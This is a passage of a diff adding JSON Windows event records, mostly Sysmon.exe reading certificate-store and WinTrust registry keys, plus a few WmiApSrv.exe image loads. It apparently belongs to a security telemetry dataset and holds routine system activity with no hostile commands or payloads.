"C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573480730000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482920000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", 
+ "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 
131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust 
Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573483080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573483080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573483080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "WmiApSrv.exe", + "image_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", + "pid": 7720, + "process_name": "WmiApSrv.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573483080000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573483080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573483080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573483080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573483080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + 
"registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573483080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573483080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573483080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573483080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573483080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + 
}, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573483080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573483080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573483080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573483080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + 
"timestamp": 131883573483080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573483080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573483080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573483080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573483080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573483080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573483080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573483080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573483080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573483080000, + 
"unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "psapi.dll", + "image_path": "C:\\Windows\\System32\\psapi.dll", + "pid": 7720, + "process_name": "WmiApSrv.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", + "timestamp": 131883573481830000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" + }, + { + "event_type": "image_load", + "image_name": "loadperf.dll", + "image_path": "C:\\Windows\\System32\\loadperf.dll", + "pid": 7720, + "process_name": "WmiApSrv.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", + "timestamp": 131883573481830000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573483230000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573483230000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573483230000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + 
}, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573483230000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573483230000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573483230000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573483230000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + 
"registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573483230000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573483230000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573483230000, + 